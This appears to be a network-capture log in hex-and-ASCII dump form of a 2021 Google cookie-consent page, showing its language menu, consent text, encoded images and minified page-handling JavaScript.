                                                                                                                                                                      2021-09-14 14:03:24 UTC118INData Raw: 22 30 22 3e 3c 73 70 61 6e 20 64 69 72 3d 22 6c 74 72 22 3e e2 80 ab d8 a7 d9 84 d8 b9 d8 b1 d8 a8 d9 8a d8 a9 e2 80 ac 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 47 65 30 41 75 62 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 e2 80 ab d9 81 d8 a7 d8 b1 d8 b3 db 8c e2 80 ac 22 20 64 61 74 61 2d 68 6c 3d 22 66 61 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 69 74 65 6d 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 3c 73 70 61 6e 20 64 69 72 3d 22 6c 74 72 22 3e e2 80 ab d9 81 d8 a7 d8 b1 d8 b3 db 8c e2 80 ac 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 47 65 30 41 75 62 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 e2 80 aa e1 8a a0 e1 88 9b e1 88 ad e1 8a 9b e2 80 ac 22 20 64 61 74 61 2d 68 6c 3d 22 61 6d 22 20 72 6f 6c 65
                                                                                                                                                                      Data Ascii: "0"><span dir="ltr"></span></li><li class="Ge0Aub" aria-label="" data-hl="fa" role="menuitem" tabindex="0"><span dir="ltr"></span></li><li class="Ge0Aub" aria-label="" data-hl="am" role
                                                                                                                                                                      2021-09-14 14:03:24 UTC119INData Raw: e0 b1 81 e2 80 ac 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 47 65 30 41 75 62 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 e2 80 aa e0 b2 95 e0 b2 a8 e0 b3 8d e0 b2 a8 e0 b2 a1 e2 80 ac 22 20 64 61 74 61 2d 68 6c 3d 22 6b 6e 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 69 74 65 6d 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e e2 80 aa e0 b2 95 e0 b2 a8 e0 b3 8d e0 b2 a8 e0 b2 a1 e2 80 ac 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 47 65 30 41 75 62 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 e2 80 aa e0 b4 ae e0 b4 b2 e0 b4 af e0 b4 be e0 b4 b3 e0 b4 82 e2 80 ac 22 20 64 61 74 61 2d 68 6c 3d 22 6d 6c 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 69 74 65 6d 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e e2 80 aa e0 b4 ae e0 b4 b2 e0 b4 af e0 b4 be e0 b4 b3 e0 b4 82 e2 80
                                                                                                                                                                      Data Ascii: </li><li class="Ge0Aub" aria-label="" data-hl="kn" role="menuitem" tabindex="0"></li><li class="Ge0Aub" aria-label="" data-hl="ml" role="menuitem" tabindex="0">
                                                                                                                                                                      2021-09-14 14:03:24 UTC121INData Raw: ae 80 e4 bd 93 e4 b8 ad e6 96 87 e2 80 ac 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 47 65 30 41 75 62 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 e2 80 aa e7 b9 81 e9 ab 94 e4 b8 ad e6 96 87 e2 80 ac 22 20 64 61 74 61 2d 68 6c 3d 22 7a 68 2d 54 57 22 20 72 6f 6c 65 3d 22 6d 65 6e 75 69 74 65 6d 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e e2 80 aa e7 b9 81 e9 ab 94 e4 b8 ad e6 96 87 e2 80 ac 3c 2f 6c 69 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6e 65 44 59 77 22 20 69 64 3d 22 67 6b 73 53 31 64 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 69 67 6e 20 69 6e 22 20 64 61 74 61 2d 76 65 64 3d 22 30 61 68 55 4b 45 77 69 4e 73 61 4c 63 30 50 37 79 41 68 57 4e 33 4b 51 4b 48 52 6c 58 42 7a 73 51 69
                                                                                                                                                                      Data Ascii: </li><li class="Ge0Aub" aria-label="" data-hl="zh-TW" role="menuitem" tabindex="0"></li></div></div></div><button class="neDYw" id="gksS1d" aria-label="Sign in" data-ved="0ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQi
                                                                                                                                                                      2021-09-14 14:03:24 UTC122INData Raw: 6a 51 79 4e 53 41 33 4c 6a 55 67 4d 54 55 67 4e 79 34 31 57 6b 30 78 4d 79 34 78 4d 6a 55 67 4d 54 45 75 4f 44 63 31 51 7a 45 7a 4c 6a 45 79 4e 53 41 78 4d 69 34 35 4d 54 49 31 49 44 45 7a 4c 6a 6b 32 4d 6a 55 67 4d 54 4d 75 4e 7a 55 67 4d 54 55 67 4d 54 4d 75 4e 7a 56 44 4d 54 59 75 4d 44 4d 33 4e 53 41 78 4d 79 34 33 4e 53 41 78 4e 69 34 34 4e 7a 55 67 4d 54 49 75 4f 54 45 79 4e 53 41 78 4e 69 34 34 4e 7a 55 67 4d 54 45 75 4f 44 63 31 51 7a 45 32 4c 6a 67 33 4e 53 41 78 4d 43 34 34 4d 7a 63 31 49 44 45 32 4c 6a 41 7a 4e 7a 55 67 4d 54 41 67 4d 54 55 67 4d 54 42 44 4d 54 4d 75 4f 54 59 79 4e 53 41 78 4d 43 41 78 4d 79 34 78 4d 6a 55 67 4d 54 41 75 4f 44 4d 33 4e 53 41 78 4d 79 34 78 4d 6a 55 67 4d 54 45 75 4f 44 63 31 57 69 49 67 5a 6d 6c 73 62 44 30 69
                                                                                                                                                                      Data Ascii: jQyNSA3LjUgMTUgNy41Wk0xMy4xMjUgMTEuODc1QzEzLjEyNSAxMi45MTI1IDEzLjk2MjUgMTMuNzUgMTUgMTMuNzVDMTYuMDM3NSAxMy43NSAxNi44NzUgMTIuOTEyNSAxNi44NzUgMTEuODc1QzE2Ljg3NSAxMC44Mzc1IDE2LjAzNzUgMTAgMTUgMTBDMTMuOTYyNSAxMCAxMy4xMjUgMTAuODM3NSAxMy4xMjUgMTEuODc1WiIgZmlsbD0i
                                                                                                                                                                      2021-09-14 14:03:24 UTC123INData Raw: 4e 79 66 73 2f 61 46 74 57 53 74 6f 62 42 78 42 45 38 42 33 47 39 35 45 31 73 75 56 77 4f 4f 79 5a 71 37 7a 46 59 56 6b 6e 67 73 56 68 59 52 38 34 69 32 55 64 7a 70 77 73 6c 6e 55 49 4f 49 75 35 48 4f 71 4c 74 32 72 44 76 34 32 2b 57 47 79 66 43 35 46 56 78 65 42 6b 69 6f 62 4b 56 70 6c 57 6e 69 37 52 57 32 7a 65 4e 62 4b 36 65 4a 32 32 78 6a 59 51 46 65 6c 31 53 36 67 73 4e 73 39 46 36 4c 4b 75 4b 48 63 51 6e 55 78 77 6f 5a 45 66 50 6e 4a 36 4c 63 65 6e 78 65 59 46 36 48 56 6c 50 59 52 70 6c 38 4a 47 49 2f 43 61 35 4e 68 59 62 46 36 6b 30 39 56 31 52 4a 6d 69 59 68 78 6a 42 2b 36 35 4a 36 33 46 31 6e 6e 49 75 72 6f 4d 55 33 38 6e 74 57 31 49 6b 44 66 6a 77 61 37 55 75 68 63 62 70 6e 36 34 75 59 35 48 39 50 4a 6d 72 47 69 41 6a 52 64 74 67 72 30 34 45 70
                                                                                                                                                                      Data Ascii: Nyfs/aFtWStobBxBE8B3G95E1suVwOOyZq7zFYVkngsVhYR84i2UdzpwslnUIOIu5HOqLt2rDv42+WGyfC5FVxeBkiobKVplWni7RW2zeNbK6eJ22xjYQFel1S6gsNs9F6LKuKHcQnUxwoZEfPnJ6LcenxeYF6HVlPYRpl8JGI/Ca5NhYbF6k09V1RJmiYhxjB+65J63F1nnIuroMU38ntW1IkDfjwa7Uuhcbpn64uY5H9PJmrGiAjRdtgr04Ep
                                                                                                                                                                      2021-09-14 14:03:24 UTC124INData Raw: 76 44 66 41 31 35 74 4e 77 6b 53 43 63 7a 70 4d 46 75 68 75 78 76 39 6e 41 51 6a 42 49 6b 4f 61 4d 41 34 73 36 52 46 4f 55 4e 6c 33 30 41 56 6d 4f 45 52 36 6f 53 34 64 36 42 4a 65 42 68 45 31 6b 47 38 48 56 49 5a 71 69 74 4e 6d 69 44 77 34 58 43 67 34 50 55 70 73 68 62 53 70 70 77 4d 70 74 46 71 49 56 46 49 30 57 50 51 38 58 64 78 44 4f 36 5a 70 76 76 36 56 76 6b 32 59 6e 2b 7a 5a 70 54 58 6b 48 4a 6f 75 65 4c 46 4b 59 53 41 4f 4c 47 62 79 41 7a 32 50 34 39 4c 30 6b 4d 30 57 50 5a 6f 74 55 5a 69 4d 44 52 52 64 68 4b 79 66 77 53 6d 57 58 6f 72 39 2b 76 55 58 30 55 62 6a 59 67 50 44 49 4f 4e 45 6c 75 4d 6f 4a 76 41 45 30 64 69 66 36 61 36 66 7a 64 55 33 30 2f 48 67 52 35 33 67 32 4f 54 67 52 48 45 78 6d 30 67 56 7a 30 30 52 58 77 48 67 43 68 67 70 39 4a 51
                                                                                                                                                                      Data Ascii: vDfA15tNwkSCczpMFuhuxv9nAQjBIkOaMA4s6RFOUNl30AVmOER6oS4d6BJeBhE1kG8HVIZqitNmiDw4XCg4PUpshbSppwMptFqIVFI0WPQ8XdxDO6Zpvv6Vvk2Yn+zZpTXkHJoueLFKYSAOLGbyAz2P49L0kM0WPZotUZiMDRRdhKyfwSmWXor9+vUX0UbjYgPDIONEluMoJvAE0dif6a6fzdU30/HgR53g2OTgRHExm0gVz00RXwHgChgp9JQ
                                                                                                                                                                      2021-09-14 14:03:24 UTC126INData Raw: 41 48 6b 63 50 39 50 63 4c 67 36 5a 4c 70 43 6a 58 74 36 49 73 48 57 6f 56 30 44 54 46 44 6b 73 48 45 6c 67 36 59 76 62 63 79 35 36 70 78 45 52 43 33 38 64 78 58 69 79 56 52 74 51 5a 6a 6a 51 42 37 55 53 54 4f 64 44 76 77 6a 6d 2f 34 30 4f 6a 39 37 4f 33 36 75 37 45 30 52 6b 4b 67 50 62 65 70 6f 31 73 65 4b 63 32 47 57 68 6b 63 72 7a 79 5a 70 69 42 70 72 75 75 33 38 4a 42 66 36 4e 37 75 41 48 4c 64 6f 4d 44 6b 51 37 76 76 49 66 38 43 44 51 54 69 5a 32 50 49 39 32 66 73 47 68 75 61 45 51 72 76 6d 47 67 2f 38 66 75 53 70 6a 4d 68 6c 71 2b 47 30 4c 44 69 57 6a 43 67 6d 4f 72 50 47 67 34 4d 37 38 51 77 52 53 38 59 76 43 68 52 78 6c 6f 4b 70 63 4e 42 35 32 6c 7a 79 55 51 4f 74 49 70 75 50 63 67 4e 6f 46 47 2b 58 49 66 66 4b 53 46 62 4c 44 37 69 30 72 2f 47 41
                                                                                                                                                                      Data Ascii: AHkcP9PcLg6ZLpCjXt6IsHWoV0DTFDksHElg6Yvbcy56pxERC38dxXiyVRtQZjjQB7USTOdDvwjm/40Oj97O36u7E0RkKgPbepo1seKc2GWhkcrzyZpiBpruu38JBf6N7uAHLdoMDkQ7vvIf8CDQTiZ2PI92fsGhuaEQrvmGg/8fuSpjMhlq+G0LDiWjCgmOrPGg4M78QwRS8YvChRxloKpcNB52lzyUQOtIpuPcgNoFG+XIffKSFbLD7i0r/GA
                                                                                                                                                                      2021-09-14 14:03:24 UTC127INData Raw: 38 30 30 30 0d 0a 4b 68 64 62 33 39 54 44 51 7a 54 4b 52 74 71 69 74 4e 4e 76 51 34 37 69 69 48 42 7a 78 30 6f 4b 68 39 33 56 55 42 4d 53 37 41 6c 31 32 53 57 76 2f 46 4d 66 56 5a 44 43 30 65 47 6e 42 30 41 6a 32 42 5a 48 72 39 6c 52 4b 4c 6d 6c 4e 48 57 57 76 4b 4e 38 34 61 65 48 53 41 71 43 78 4c 34 68 34 64 77 6e 6c 79 70 38 6a 65 30 53 36 70 50 30 39 2b 72 31 39 75 38 70 74 4d 41 61 43 41 4e 77 72 35 52 72 42 39 7a 49 7a 4d 30 7a 2b 68 70 6e 78 75 72 55 6d 71 67 4f 62 6f 68 56 79 50 42 66 77 36 70 4e 6c 57 6e 6e 34 4c 37 6a 39 30 75 62 68 44 69 65 56 52 64 38 62 51 34 6c 36 58 68 51 36 2f 78 6e 33 66 64 6d 6b 4f 55 63 6e 44 2b 32 6b 75 52 70 45 66 6c 34 36 44 4b 47 64 4e 4e 66 64 54 56 70 47 39 48 63 56 75 52 6b 47 44 4b 47 64 64 49 78 6e 69 59 69 65
                                                                                                                                                                      Data Ascii: 8000Khdb39TDQzTKRtqitNNvQ47iiHBzx0oKh93VUBMS7Al12SWv/FMfVZDC0eGnB0Aj2BZHr9lRKLmlNHWWvKN84aeHSAqCxL4h4dwnlyp8je0S6pP09+r19u8ptMAaCANwr5RrB9zIzM0z+hpnxurUmqgObohVyPBfw6pNlWnn4L7j90ubhDieVRd8bQ4l6XhQ6/xn3fdmkOUcnD+2kuRpEfl46DKGdNNfdTVpG9HcVuRkGDKGddIxniYie
                                                                                                                                                                      2021-09-14 14:03:24 UTC128INData Raw: 64 74 68 3a 32 37 31 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 32 30 70 78 3b 68 65 69 67 68 74 3a 34 30 30 70 78 3b 73 63 72 6f 6c 6c 2d 62 65 68 61 76 69 6f 72 3a 73 6d 6f 6f 74 68 7d 2e 49 4b 6c 37 51 20 75 6c 7b 6d 61 72 67 69 6e 3a 30 20 31 38 70 78 3b 70 61 64 64 69 6e 67 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 30 7d 2e 74 48 6c 70 38 64 7b 68 65 69 67 68 74 3a 34 38 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 34 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 62 6f 72 64 65 72 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 74 48 6c 70 38 64 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 3a 30 3b 6f 75 74 6c 69 6e 65 3a 30 7d 2e 6a 79 66 48 79 64 7b 70 6f 73 69 74
                                                                                                                                                                      Data Ascii: dth:271px;padding:0 20px;height:400px;scroll-behavior:smooth}.IKl7Q ul{margin:0 18px;padding-inline-start:0}.tHlp8d{height:48px;display:inline-block;margin:0 4px;cursor:pointer;border:0;background:transparent}.tHlp8d:focus{border:0;outline:0}.jyfHyd{posit
                                                                                                                                                                      2021-09-14 14:03:24 UTC129INData Raw: 63 6c 61 73 73 3d 22 65 4c 5a 59 79 66 22 3e 47 6f 6f 67 6c 65 20 75 73 65 73 20 3c 61 20 63 6c 61 73 73 3d 22 46 34 61 31 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 6c 69 63 69 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 74 65 63 68 6e 6f 6c 6f 67 69 65 73 2f 63 6f 6f 6b 69 65 73 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 75 63 62 73 26 61 6d 70 3b 68 6c 3d 65 6e 2d 47 42 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 63 6f 6f 6b 69 65 73 3c 2f 61 3e 20 61 6e 64 20 64 61 74 61 20 74 6f 3a 3c 75 6c 20 63 6c 61 73 73 3d 22 64 62 58 4f 39 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 67 6f 77 73 59 64 20 69 62 43 46 30 63 22 3e 44 65 6c 69 76 65 72 20 61 6e 64 20 6d 61 69 6e 74 61 69 6e 20 73 65 72 76 69 63 65 73 2c 20 6c 69 6b 65 20 74 72 61 63 6b 69
                                                                                                                                                                      Data Ascii: class="eLZYyf">Google uses <a class="F4a1l" href="https://policies.google.com/technologies/cookies?utm_source=ucbs&amp;hl=en-GB" target="_blank">cookies</a> and data to:<ul class="dbXO9"><li class="gowsYd ibCF0c">Deliver and maintain services, like tracki
                                                                                                                                                                      2021-09-14 14:03:24 UTC131INData Raw: 20 6d 6f 72 65 20 72 65 6c 65 76 61 6e 74 20 72 65 73 75 6c 74 73 20 61 6e 64 20 72 65 63 6f 6d 6d 65 6e 64 61 74 69 6f 6e 73 2c 20 61 20 63 75 73 74 6f 6d 69 73 65 64 20 59 6f 75 54 75 62 65 20 68 6f 6d 65 70 61 67 65 2c 20 61 6e 64 20 61 64 73 20 74 68 61 74 20 61 72 65 20 74 61 69 6c 6f 72 65 64 20 74 6f 20 79 6f 75 72 20 69 6e 74 65 72 65 73 74 73 2e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 79 53 31 6e 6c 64 22 3e 43 6c 69 63 6b 20 27 43 75 73 74 6f 6d 69 73 65 27 20 74 6f 20 72 65 76 69 65 77 20 6f 70 74 69 6f 6e 73 2c 20 69 6e 63 6c 75 64 69 6e 67 20 63 6f 6e 74 72 6f 6c 73 20 74 6f 20 72 65 6a 65 63 74 20 74 68 65 20 75 73 65 20 6f 66 20 63 6f 6f 6b 69 65 73 20 66 6f 72 20 70 65 72 73 6f 6e 61 6c 69 73 61 74 69 6f 6e 20 61 6e 64 20 69
                                                                                                                                                                      Data Ascii: more relevant results and recommendations, a customised YouTube homepage, and ads that are tailored to your interests.</div><div class="yS1nld">Click 'Customise' to review options, including controls to reject the use of cookies for personalisation and i
                                                                                                                                                                      2021-09-14 14:03:24 UTC132INData Raw: 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 26 6d 69 64 64 6f 74 3b 3c 2f 64 69 76 3e 3c 61 20 63 6c 61 73 73 3d 22 70 65 52 4c 32 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 6c 69 63 69 65 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 74 65 72 6d 73 3f 68 6c 3d 65 6e 2d 47 42 26 61 6d 70 3b 66 67 3d 31 26 61 6d 70 3b 75 74 6d 5f 73 6f 75 72 63 65 3d 75 63 62 73 22 20 69 64 3d 22 48 51 31 6c 62 22 20 64 61 74 61 2d 76 65 64 3d 22 30 61 68 55 4b 45 77 69 4e 73 61 4c 63 30 50 37 79 41 68 57 4e 33 4b 51 4b 48 52 6c 58 42 7a 73 51 6b 4a 41 48 43 42 30 22 3e 54 65 72 6d 73 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d
                                                                                                                                                                      Data Ascii: " aria-hidden="true">&middot;</div><a class="peRL2e" href="https://policies.google.com/terms?hl=en-GB&amp;fg=1&amp;utm_source=ucbs" id="HQ1lb" data-ved="0ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQkJAHCB0">Terms</a></div></div></div></span></div></div><script nonce=
                                                                                                                                                                      2021-09-14 14:03:24 UTC133INData Raw: 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 4f 66 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 4f 66 2e 63 61 6c 6c 28 61 2c 62 2c 76 6f 69 64 20 30 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 61 29 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 3d 74 79 70 65 6f 66 20 62 7c 7c 31 21 3d 62 2e 6c 65 6e 67 74 68 3f 2d 31 3a 61 2e 69 6e 64 65 78 4f 66 28 62 2c 30 29 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 63 20 69 6e 20 61 26 26 61 5b 63 5d 3d 3d 3d 62 29 72 65 74 75 72 6e 20 63 3b 72 65 74 75 72 6e 2d 31 7d 2c 70 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74
                                                                                                                                                                      Data Ascii: prototype.indexOf?function(a,b){return Array.prototype.indexOf.call(a,b,void 0)}:function(a,b){if("string"===typeof a)return"string"!==typeof b||1!=b.length?-1:a.indexOf(b,0);for(var c=0;c<a.length;c++)if(c in a&&a[c]===b)return c;return-1},p=Array.protot
                                                                                                                                                                      2021-09-14 14:03:24 UTC134INData Raw: 7a 28 22 54 72 69 64 65 6e 74 22 29 7c 7c 7a 28 22 4d 53 49 45 22 29 2c 65 61 3d 7a 28 22 45 64 67 65 22 29 2c 66 61 3d 7a 28 22 47 65 63 6b 6f 22 29 26 26 21 28 2d 31 21 3d 77 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 77 65 62 6b 69 74 22 29 26 26 21 7a 28 22 45 64 67 65 22 29 29 26 26 21 28 7a 28 22 54 72 69 64 65 6e 74 22 29 7c 7c 7a 28 22 4d 53 49 45 22 29 29 26 26 21 7a 28 22 45 64 67 65 22 29 2c 47 3d 2d 31 21 3d 77 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 77 65 62 6b 69 74 22 29 26 26 21 7a 28 22 45 64 67 65 22 29 2c 48 3b 61 3a 7b 76 61 72 20 49 3d 22 22 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 77 3b 69 66 28 66 61 29 72 65 74 75 72 6e 2f 72 76 3a 28 5b 5e 5c 29 3b 5d
                                                                                                                                                                      Data Ascii: z("Trident")||z("MSIE"),ea=z("Edge"),fa=z("Gecko")&&!(-1!=w.toLowerCase().indexOf("webkit")&&!z("Edge"))&&!(z("Trident")||z("MSIE"))&&!z("Edge"),G=-1!=w.toLowerCase().indexOf("webkit")&&!z("Edge"),H;a:{var I="",J=function(){var a=w;if(fa)return/rv:([^\);]
                                                                                                                                                                      2021-09-14 14:03:24 UTC136INData Raw: 61 74 61 73 65 74 29 7b 69 66 28 45 28 29 26 26 21 28 22 76 65 64 22 69 6e 20 61 2e 64 61 74 61 73 65 74 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 3d 61 2e 64 61 74 61 73 65 74 2e 76 65 64 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 61 3f 6e 75 6c 6c 3a 61 7d 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 22 2b 22 76 65 64 22 2e 72 65 70 6c 61 63 65 28 2f 28 5b 41 2d 5a 5d 29 2f 67 2c 22 2d 24 31 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7d 3b 76 61 72 20 71 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 67 3d 5b 5d 3b 74 68 69 73 2e 68 3d 22 22 7d 2c 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 22 22 3b 62 26 26 28 63 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66
                                                                                                                                                                      Data Ascii: ataset){if(E()&&!("ved"in a.dataset))return null;a=a.dataset.ved;return void 0===a?null:a}return a.getAttribute("data-"+"ved".replace(/([A-Z])/g,"-$1").toLowerCase())};var qa=function(){this.g=[];this.h=""},ra=function(a,b){var c="";b&&(c="string"==typeof
                                                                                                                                                                      2021-09-14 14:03:24 UTC137INData Raw: 68 2b 22 2e 22 2b 75 3a 22 22 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 64 65 64 75 70 65 2d 69 6e 73 65 72 74 22 3a 65 2e 70 75 73 68 28 66 2b 22 2e 22 2b 6c 2b 22 2e 69 22 2b 28 75 3f 22 2e 31 2e 22 2b 68 2b 22 2e 22 2b 75 3a 22 2e 31 22 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 68 69 64 65 22 3a 65 2e 70 75 73 68 28 66 2b 22 2e 22 2b 6c 2b 22 2e 68 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 63 6f 70 79 22 3a 65 2e 70 75 73 68 28 22 2e 22 2b 44 2b 22 2e 63 22 29 7d 7d 4f 28 6b 2c 22 76 65 74 22 2c 65 2e 6c 65 6e 67 74 68 3f 22 31 22 2b 65 2e 6a 6f 69 6e 28 22 3b 22 29 3a 22 22 29 7d 69 66 28 61 29 66 6f 72 28 76 61 72 20 6d 61 20 69 6e 20 61 29 4f 28 6b 2c 6d 61 2c 61 5b 6d 61 5d 29 3b 6b 2e 6c 6f 67 28 29 7d 2c 79 61 3d 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                      Data Ascii: h+"."+u:""));break;case "dedupe-insert":e.push(f+"."+l+".i"+(u?".1."+h+"."+u:".1"));break;case "hide":e.push(f+"."+l+".h");break;case "copy":e.push("."+D+".c")}}O(k,"vet",e.length?"1"+e.join(";"):"")}if(a)for(var ma in a)O(k,ma,a[ma]);k.log()},ya=function
                                                                                                                                                                      2021-09-14 14:03:24 UTC138INData Raw: 73 74 49 6e 64 65 78 4f 66 28 63 2c 30 29 29 72 65 74 75 72 6e 20 64 2e 73 75 62 73 74 72 28 63 2e 6c 65 6e 67 74 68 29 3b 69 66 28 64 3d 3d 61 29 72 65 74 75 72 6e 22 22 7d 72 65 74 75 72 6e 20 62 7d 3b 76 61 72 20 7a 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 67 65 74 28 22 54 45 53 54 43 4f 4f 4b 49 45 53 45 4e 41 42 4c 45 44 22 29 3b 61 2e 73 65 74 28 22 54 45 53 54 43 4f 4f 4b 49 45 53 45 4e 41 42 4c 45 44 22 2c 22 22 2c 7b 49 3a 30 2c 70 61 74 68 3a 76 6f 69 64 20 30 2c 64 6f 6d 61 69 6e 3a 76 6f 69 64 20 30 7d 29 7d 3b 76 61 72 20 51 3d 6e 65 77 20 50 3b 76 61 72 20 52 3b 76 61 72 20 42 61 3d 46 7c 7c 47 3b 76 61 72 20 53 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67
                                                                                                                                                                      Data Ascii: stIndexOf(c,0))return d.substr(c.length);if(d==a)return""}return b};var za=function(a){a.get("TESTCOOKIESENABLED");a.set("TESTCOOKIESENABLED","",{I:0,path:void 0,domain:void 0})};var Q=new P;var R;var Ba=F||G;var S=function(a){var b=document;return"string
                                                                                                                                                                      2021-09-14 14:03:24 UTC140INData Raw: 28 29 7b 72 65 74 75 72 6e 20 61 2e 66 6f 63 75 73 28 29 7d 2c 35 30 30 29 7d 0a 76 61 72 20 4a 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 4e 28 61 2e 69 2c 7b 6a 3a 33 7d 29 3b 69 66 28 62 2e 74 61 72 67 65 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 6c 65 6d 65 6e 74 26 26 28 61 3d 62 2e 74 61 72 67 65 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 68 6c 22 29 29 29 7b 62 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 22 68 6c 22 29 3b 61 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 3b 66 6f 72 28 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68
                                                                                                                                                                      Data Ascii: (){return a.focus()},500)}var Ja=function(a,b){b.stopPropagation();b.preventDefault();N(a.i,{j:3});if(b.target instanceof Element&&(a=b.target.getAttribute("data-hl"))){b=encodeURIComponent("hl");a=encodeURIComponent(a);for(var c=document.location.search
                                                                                                                                                                      2021-09-14 14:03:24 UTC141INData Raw: 7c 28 62 3d 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 22 29 2c 62 3d 6e 65 77 20 76 28 62 2c 74 29 29 2c 61 2e 68 72 65 66 3d 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 76 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 76 3f 62 2e 67 3a 22 74 79 70 65 5f 65 72 72 6f 72 3a 53 61 66 65 55 72 6c 22 29 7d 2c 4d 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6e 75 6c 6c 3d 3d 62 7c 7c 62 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 61 2e 69 26 26 61 2e 73 26 26 21 61 2e 76 26 26 28 61 2e 69 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 62 6c 6f 63 6b 22 2c 61 2e 76 3d 21 30 2c 61 2e 4c 26 26 49 61 28 61 2e 69 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 6c 69 22 29 29 2c 61 2e 73 2e 73 65 74 41 74 74 72 